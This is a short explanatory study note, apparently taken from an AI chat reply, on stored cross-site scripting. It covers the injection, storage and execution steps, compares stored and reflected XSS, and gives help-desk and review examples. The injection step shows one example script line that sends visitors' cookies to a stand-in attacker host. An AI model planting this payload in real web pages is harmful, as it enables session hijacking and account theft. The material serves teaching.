In cybersecurity—specifically within the context of Cross-Site Scripting (XSS)—a Stored Attack (also known as Persistent XSS or Type II XSS) is one of the most dangerous forms of injection.
It occurs when an attacker successfully “plants” a malicious script onto a target server, where it is permanently saved in a database, forum post, comment field, or user profile.
How it Works (The 3-Step Process)
-
Injection: The attacker finds a website that takes user input but doesn’t “sanitize” it (e.g., a comment box or a “Bio” section). They enter a malicious script instead of plain text, such as:
<script>document.location='http://attacker.com/steal?cookie=' + document.cookie</script> -
Storage: The vulnerable website saves that script directly into its database, treating it like a legitimate piece of data.
-
Execution: Every time an unsuspecting user views that specific page (the blog post with the comment, the attacker’s profile, etc.), the website pulls that script from the database and sends it to the user’s browser. The browser sees it as code from a “trusted” site and executes it automatically.
Key Differences: Stored vs. Reflected
Since you’ve been looking at persistence and pentesting, understanding this distinction is vital for your WGU studies and CySA+ knowledge:
| Feature | Stored (Persistent) | Reflected attack (Non-Persistent) |
|---|---|---|
| Location | Permanently in the Server’s Database. | Temporarily in a URL or Request. |
| Delivery | Users just have to visit the page. | Users must click a malicious link. |
| Targeting | Massive: Hits everyone who views the data. | Individual: Usually hits one person at a time. |
| Social Engineering | Low: No link clicking required. | High: Attacker must trick user into clicking. |
Export to Sheets
Real-World Examples
-
A Support Ticket: An attacker submits a help desk ticket containing a script. When the IT Admin opens the ticket to help, the script runs and steals the Admin’s session cookie, giving the attacker full control of the help desk system.
-
An E-commerce Review: A malicious “5-star review” that redirects every customer who reads it to a phishing site designed to steal credit card info. #attacks attack webbrowsers